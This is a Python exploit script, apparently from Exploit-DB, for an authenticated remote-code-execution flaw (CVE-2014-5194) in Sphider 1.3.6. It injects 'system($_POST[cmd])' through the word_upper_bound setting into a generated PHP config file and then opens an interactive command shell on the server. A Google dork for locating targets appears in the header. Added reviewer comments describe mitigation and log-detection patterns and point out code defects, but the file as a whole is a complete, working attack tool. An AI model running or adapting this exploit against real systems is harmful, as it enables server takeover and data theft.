# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
# Google Dork: intitle:"Sphider Admin Login"
# Date: 2014-07-28
# Exploit Author: Gurkirat Singh
# Vendor Homepage: http://www.sphider.eu/
# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
# Version: v1.3.6
# Tested on: Windows and Linux
# CVE : CVE-2014-5194
# Proof of Concept: https://www.exploit-db.com/exploits/34189
#
# Reviewer notes (defensive context):
#   Flow as written: authenticate to /admin/auth.php, confirm the session via the
#   /admin/admin.php <title>, then submit the full settings form (f=settings) in which
#   the numeric field `_word_upper_bound` carries a non-numeric value. Subsequent
#   requests go to /settings/conf.php with a POST parameter `cmd`.
#   Mitigation: settings values that are written into a PHP configuration file must be
#   validated by type (integers cast/checked as integers, strings escaped) before being
#   persisted; the generated file should not be directly requestable.
#   Detection: an admin settings POST whose integer-typed fields contain `;` or `(`,
#   followed by POST requests to /settings/conf.php carrying a request body, is a
#   high-confidence indicator for this pattern in web-server or WAF logs.

from argparse import ArgumentParser, RawTextHelpFormatter
from huepy import *
import string
import random
from bs4 import BeautifulSoup, Tag
from requests import Session
from randua import generate as randua

# Random 13-letter marker; echoed back below to verify that the written config executes.
# NOTE(review): `random.choices` is not a CSPRNG, which is fine here — the marker is only
# a correlation token, not a secret.
_F: str = "".join(random.choices(string.ascii_letters, k=13))

parser = ArgumentParser(description="Exploit for CVE-2014-5194", formatter_class=RawTextHelpFormatter)
parser.add_argument("--target", "-t", help="target uri where application is installed", required=True, metavar="", dest="t")
parser.add_argument("--user", "-u", help="username to authenticate", required=True, metavar="", dest="u")
parser.add_argument("--password", "-p", help="password to authenticate", required=True, metavar="", dest="p")
# NOTE(review): `args.debug` is never read anywhere below, and the help text ("spawn the
# firefox window") does not match its semantics (`store_false` with `default=True` means
# passing the flag turns it OFF). Dead option.
parser.add_argument("--debug", help="if passed, spawn the firefox window", default=True, action="store_false")
# NOTE(review): `args.T` is parsed but never passed to any request; no HTTP timeout is
# actually applied, so a non-responding host blocks indefinitely.
parser.add_argument("--timeout", help="timeout in seconds (default: 1)", dest="T", metavar="", default=1)
args = parser.parse_args()

# Normalise a single trailing slash so the path concatenations below do not produce "//".
if args.t.endswith("/"):
    args.t = args.t[:-1]

print(run("Logging in"))
with Session() as http:
    data = {"user": args.u, "pass": args.p}
    # A random User-Agent is only sent on the two login requests; every later request
    # carries the default `requests` User-Agent, which is itself a loggable inconsistency.
    headers = {"User-Agent": randua()}
    # The login response is not inspected; success is inferred from the admin page title.
    http.post(args.t + '/admin/auth.php', data=data, headers=headers, allow_redirects=False)
    r = http.get(args.t + '/admin/admin.php', headers=headers, allow_redirects=False)
    # `.decode()` assumes UTF-8; a differently encoded page raises UnicodeDecodeError here.
    html = BeautifulSoup(r.content.decode(), "lxml")
    # `find` returns None when the page has no <title>, so `.text` would then raise
    # AttributeError rather than report a clean failure.
    title: Tag = html.find("title")
    if title.text == "Sphider Admin Login":
        print(bad("Failed to login"))
        exit(1)
    else:
        print(good("Logged in"))

    # Complete settings form as the admin UI would submit it. Every value except
    # `_word_upper_bound` is a plausible default; `_version_nr` is '1.3.5' although the
    # header targets 1.3.6 (presumably ignored by the form handler — not verified here).
    # The non-numeric `_word_upper_bound` value is the injection into the generated
    # PHP configuration; an integer cast on the server side would neutralise it.
    payload = {
        'f': 'settings',
        'Submit': '1',
        '_version_nr': '1.3.5',
        '_language': 'en',
        '_template': 'standard',
        '_admin_email': 'admin@localhost',
        '_print_results': '1',
        '_tmp_dir': 'tmp',
        '_log_dir': 'log',
        '_log_format': 'html',
        '_min_words_per_page': '10',
        '_min_word_length': '3',
        '_word_upper_bound': '100;system($_POST[cmd])',
        '_index_numbers': '1',
        '_index_meta_keywords': '1',
        '_pdftotext_path': 'c:\\temp\\pdftotext.exe',
        '_catdoc_path': 'c:\\temp\\catdoc.exe',
        '_xls2csv_path': 'c:\\temp\\xls2csv',
        '_catppt_path': 'c:\\temp\\catppt',
        '_user_agent': 'Sphider',
        '_min_delay': '0',
        '_strip_sessids': '1',
        '_results_per_page': '10',
        '_cat_columns': '2',
        '_bound_search_result': '0',
        '_length_of_link_desc': '0',
        '_links_to_next': '9',
        '_show_meta_description': '1',
        '_show_query_scores': '1',
        '_show_categories': '1',
        '_desc_length': '250',
        '_did_you_mean_enabled': '1',
        '_suggest_enabled': '1',
        '_suggest_history': '1',
        '_suggest_rows': '10',
        '_title_weight': '20',
        '_domain_weight': '60',
        '_path_weight': '10',
        '_meta_weight': '5'
    }
    print(run("Exploiting"))
    # Response of the settings write is not checked; the echo probe below is the only
    # success signal.
    http.post(args.t + "/admin/admin.php", data=payload)
    r = http.post(args.t + "/settings/conf.php", data={"cmd": "echo %s" % _F})
    # Exact-match comparison on the stripped body: any extra output (PHP warnings,
    # template text) makes this report failure even if the settings write succeeded.
    if r.content.decode().strip() != _F:
        print(bad("Failed"))
        exit(1)
    print(good("Exploited"))
    print(info("Spawning Shell"))
    # Both probes are Unix-specific (`whoami` output format, /etc/hostname), which is at
    # odds with the "Tested on: Windows and Linux" header.
    user = http.post(args.t + "/settings/conf.php", data={"cmd": "whoami"})
    host = http.post(args.t + "/settings/conf.php", data={"cmd": "cat /etc/hostname"})
    shell: str = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"
    # Interactive loop: the literal input "exit" ends it; so does ANY exception, because
    # the bare `except:` below catches BaseException — Ctrl-C/EOF, connection errors and
    # UnicodeDecodeError all terminate the loop silently with no message.
    while True:
        try:
            cmd = input(shell)
            if cmd == "exit":
                break
            r = http.post(args.t + "/settings/conf.php", data={"cmd": cmd})
            print(r.content.decode().strip())
        except:
            break
    print()